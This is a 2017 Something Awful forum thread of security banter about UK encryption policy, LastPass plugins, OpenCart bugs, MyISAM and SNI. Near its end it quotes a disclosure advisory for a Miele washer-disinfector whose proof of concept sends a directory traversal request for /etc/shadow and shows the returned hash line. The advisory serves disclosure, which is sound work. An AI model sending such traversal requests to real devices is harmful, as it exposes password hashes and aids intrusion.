Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.
 
  • Locked thread
big scary monsters
Sep 2, 2011

-~Skullwave~-
i'm here in my room saying some real terrorist stuff and there's no way amber rudd is ever going to find out what it is

Adbot
ADBOT LOVES YOU

Bhodi
Dec 9, 2007

Oh, it's just a cat.
Pillbug
https://twitter.com/thegrugq/status/845972521761624065

spankmeister
Jun 15, 2008






Here's some cool walkthroughs of malware reverse engineering:

https://vimeo.com/203252505

https://vimeo.com/203356169

https://vimeo.com/208229269

There's some more here:
https://vimeo.com/oalabs/videos

These guys just started posting these, hopefully they'll keep doing more.

Dex
May 26, 2006

Quintuple x!!!

Would not escrow again.

VERY MISLEADING!

big scary monsters posted:

i'm here in my room saying some real terrorist stuff and there's no way amber rudd is ever going to find out what it is

i'm going to tell on you

goddamnedtwisto
Dec 31, 2004

If you ask me about the mole people in the London Underground, I WILL be forced to kill you
Fun Shoe

big scary monsters posted:

i'm here in my room saying some real terrorist stuff and there's no way amber rudd is ever going to find out what it is

could you speak up a bit, or at least get a bit closer to your television please?

ate shit on live tv
Feb 15, 2004

by Azathoth

Loving Africa Chaps posted:

Backdoors are so in again darling

https://twitter.com/MarrShow/status/845921671835934720

But it's OK the government don't want to get inside the cloud :laffo:

The UK is such poo poo.

necrotic
Aug 2, 2005
I owe my brother big time for this!

ate poo poo on live tv posted:

You call the bank on the phone?

whats this phone thing

moonshine is......
Feb 21, 2007

goddamnedtwisto posted:

could you speak up a bit, or at least get a bit closer to your television please?

I think you mean microwave.

Shaggar
Apr 26, 2006

how did he get a process to run from chome in the first place?

Meat Beat Agent
Aug 5, 2007

felonious assault with a sproinging boner
NPAPI plugin wrapper, judging by the name of the lastpass process

Doom Mathematic
Sep 2, 2008

Westie posted:

the forums are so old most exploits probably aren't in it

Can you still log in using plain HTTP?

Shaggar
Apr 26, 2006

Meat Beat Agent posted:

NPAPI plugin wrapper, judging by the name of the lastpass process

I thought they got rid of that.

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

Shaggar posted:

I thought they got rid of that.
not yet

Doom Mathematic posted:

Can you still log in using plain HTTP?
my friend you can't even browse the forums on http anymore

compuserved
Mar 20, 2006

Nap Ghost

PCjr sidecar posted:

http://www.bailis.org/papers/acidrain-sigmod2017.pdf

shopping carts continue to be real bad; interesting paper

with bonus visit from secthread MVP opencart

lol, ofc daniel kerr is his usual self in the bug reports:

https://github.com/opencart/opencart/issues/4811#issuecomment-242966671
https://github.com/opencart/opencart/issues/4812#issuecomment-242966713

akadajet
Sep 14, 2003


god bless him

minivanmegafun
Jul 27, 2004


https://github.com/opencart/opencart/blob/master/upload/install/opencart.sql

i know this is probably the least interesting thing about the dumpsterfire that is opencast but omg MyISAM tables in tyool 2017

for those of you that aren't familiar with mysql's bad decisions pre 5.0 myisam doesn't support transactions

minivanmegafun fucked around with this message at 23:47 on Mar 26, 2017

Subjunctive
Sep 12, 2006

✨sparkle and shine✨

minivanmegafun posted:

myisam doesn't support transactions

aren't you a fragile flower

compuserved
Mar 20, 2006

Nap Ghost

finally finished reading the paper and the authors mention kerr's reaction lol

http://www.bailis.org/papers/acidrain-sigmod2017.pdf posted:

In contrast, the developer of OpenCart responded to the inventory vulnerability by posting a comment—“use your brain! its [sic] not hard to come up with a solution that does not involve coding!”—then closed both the inventory and voucher vulnerability issues and blocked us from responding.

compuserved fucked around with this message at 01:04 on Mar 27, 2017

wolrah
May 8, 2006
what?

Shaggar posted:

how did he get a process to run from chome in the first place?

The browser extensions have an optional binary component that allows them to do things beyond what the browser will let them do.

https://lastpass.com/support.php?cmd=showfaq&id=826

I'm 90% sure that's what nplastpass.exe is.

Munkeymon
Aug 14, 2003

Motherfucker's got an
armor-piercing crowbar! Rigoddamndicu𝜆ous.



minivanmegafun posted:

https://github.com/opencart/opencart/blob/master/upload/install/opencart.sql

i know this is probably the least interesting thing about the dumpsterfire that is opencast but omg MyISAM tables in tyool 2017

for those of you that aren't familiar with mysql's bad decisions pre 5.0 myisam doesn't support transactions

didn't it not have foreign keys or maybe that's all of MySqueal? IDK I use that as a job listing filter so hopefully I'll never have to care about it (again)

minivanmegafun
Jul 27, 2004

Munkeymon posted:

didn't it not have foreign keys or maybe that's all of MySqueal? IDK I use that as a job listing filter so hopefully I'll never have to care about it (again)

yeah FK constraints aren't possible using MyISAM tables either.

both of theses issues are fixed in InnoDB but it's Not Free as MyISAM or at least wasn't until recently I forget

Shame Boy
Mar 2, 2010

big scary monsters posted:

i'm here in my room saying some real terrorist stuff and there's no way amber rudd is ever going to find out what it is

what terrorist hashtags are you using, are they the necessary ones i bet they're the necessary ones

anthonypants
May 6, 2007

by Nyc_Tattoo
Dinosaur Gum

CrazyLittle posted:

probably charging for assigning a public ip
the support guy just got back to me

quote:

The $20/month fee is for your entire account. So no matter how many sites you transition to SSL, the cost is still going to be $20/month. The reason we charge for SSL is that we spin up a server just for your account when we implement SSL. This provides your site with a unique IP address, and a unique server, not a shared asset as the rest of Cloud Sites is implemented. I see there's also a little confusion about why you can't access a Cloud Site using the IP address, rather than the domain name. The IP address for your site is tied to a load balancer that is associated with a particular data pod. Because that loadbalancer is a shared resource, the same IP address is shared with many other accounts. Our system needs to parse the domain name in order to determine which content to retrieve and serve. I hope this clears up any questions you have.
so they are using sni, just not on their regular servers, and the $20 is to move to one of those servers, which also gets a unique ip address

RISCy Business
Jun 17, 2015

bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork bork
Fun Shoe

people who don't even know what a loving hashtag is want to break encryption

please loving murder me

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

anthonypants posted:

the support guy just got back to me
so they are using sni, just not on their regular servers, and the $20 is to move to one of those servers, which also gets a unique ip address

Is this overall a good or bad way to run this sort of thing?

Truga
May 4, 2014
Lipstick Apathy
generally, if you're doing something that profits off ssl, you don't want some shitlord's homegrown nope.js app or ancient wordpress installs anywhere near it, so it's good practice that they do this, but what their motivation for doing it is, i dunno

Midjack
Dec 24, 2007



Truga posted:

generally, if you're doing something that profits off ssl, you don't want some shitlord's homegrown nope.js app or ancient wordpress installs anywhere near it, so it's good practice that they do this, but what their motivation for doing it is, i dunno

if the question is "why does a business do a thing" the answer is "because they think it will make them money somehow"

spankmeister
Jun 15, 2008






Truga posted:

generally, if you're doing something that profits off ssl, you don't want some shitlord's homegrown nope.js app or ancient wordpress installs anywhere near it, so it's good practice that they do this, but what their motivation for doing it is, i dunno

Before the SNI days (IE6 times) a unique IP address was a hard requirement for using SSL on your web sight. Web hosters would charge you extra for that.

Guess they just never stopped doing that.

minivanmegafun posted:

yeah FK constraints aren't possible using MyISAM tables either.

both of theses issues are fixed in InnoDB but it's Not Free as MyISAM or at least wasn't until recently I forget

Innodb is dual licensed but one of them is gpl so only the most :rms2: of purists would care.

geonetix
Mar 6, 2011


I think IE 7 or 8 or maybe java 6 also had problems w/ SNI. i ran into this not too long ago

spankmeister
Jun 15, 2008






geonetix posted:

I think IE 7 or 8 or maybe java 6 also had problems w/ SNI. i ran into this not too long ago

Correct but only on XP, IE 7 and 8 on Vista and up supports SNI.

Java 6 for sure but there are lot of other reasons why Java 6's TLS implementation sucks rear end.

MononcQc
May 29, 2007

Some people, despite using SNI, still want dedicated IP addresses to avoid having their sites share IPs with some undesirable websites.

Subjunctive
Sep 12, 2006

✨sparkle and shine✨

notably, nobody who uses a commercial CDN of any size

Soylent Pudding
Jun 22, 2007

We've got people!


Register reporting on an IoT Dishwasher's web server vulnerability: https://www.theregister.co.uk/2017/03/26/miele_joins_internetofst_hall_of_shame/

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender

Soylent Pudding posted:

Register reporting on an IoT Dishwasher's web server vulnerability: https://www.theregister.co.uk/2017/03/26/miele_joins_internetofst_hall_of_shame/

better to not link to el reg

http://seclists.org/fulldisclosure/2017/Mar/63

quote:

[CVE-2017-7240] Miele Professional PG 8528 - Web Server Directory Traversal
From: Jens Regel <jregel () schneider-wulf de>
Date: Fri, 24 Mar 2017 08:27:26 +0100
Title:
======
Miele Professional PG 8528 - Web Server Directory Traversal

Author:
=======
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
=======
CVE-2017-7240

Risk Information:
=================
Risk Factor: Medium
CVSS Base Score: 5.0
CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS Temporal Vector: CVSS2#E:POC/RL:OF/RC:C
CVSS Temporal Score: 3.9

Timeline:
=========
2016-11-16 Vulnerability discovered
2016-11-10 Asked for security contact
2016-11-21 Contact with Miele product representative
2016-12-03 Send details to the Miele product representative
2017-01-19 Asked for update, no response
2017-02-03 Asked for update, no response
2017-03-23 Public disclosure

Status:
=======
Published

Affected Products:
==================
Miele Professional PG 8528 (washer-disinfector) with ethernet interface.

Vendor Homepage:
================
https://www.miele.co.uk/professional/large-capacity-washer-disinfectors-560.htm?mat=10339600&name=PG_8528

Details:
========
The corresponding embeded webserver "PST10 WebServer" typically listens
to port 80 and is prone to a directory traversal attack, therefore an
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aide in subsequent attacks.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character ist '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename="./etc/shadow"
Accept-Ranges: bytes
Content-Length: 52

root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::

Fix:
====
We are not aware of an actual fix.

Subjunctive
Sep 12, 2006

✨sparkle and shine✨

meh, directory traversal is small beer

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender
also it's for a lab tool washer, not a dishwasher

in a well actually
Jan 26, 2011

dude, you gotta end it on the rhyme

oh so its our old friend SCADA not our new friend IoT

MononcQc
May 29, 2007

Subjunctive posted:

notably, nobody who uses a commercial CDN of any size

had them once where a customer had the reverse IP lookup and found their commercial site to be sharing IPs(and in some cases with places like cloudflare, actual certificates) with porn websites and freaked out a whole lot.

Shame Boy
Mar 2, 2010

uhh why is SA trying to load flash player, i'm getting the "plugin blocked" thing when I load the page :ohdear:

Adbot
ADBOT LOVES YOU

flakeloaf
Feb 26, 2003

Still better than android clock

ate all the Oreos posted:

uhh why is SA trying to load flash player, i'm getting the "plugin blocked" thing when I load the page :ohdear:

almost certainly an ad

  • Locked thread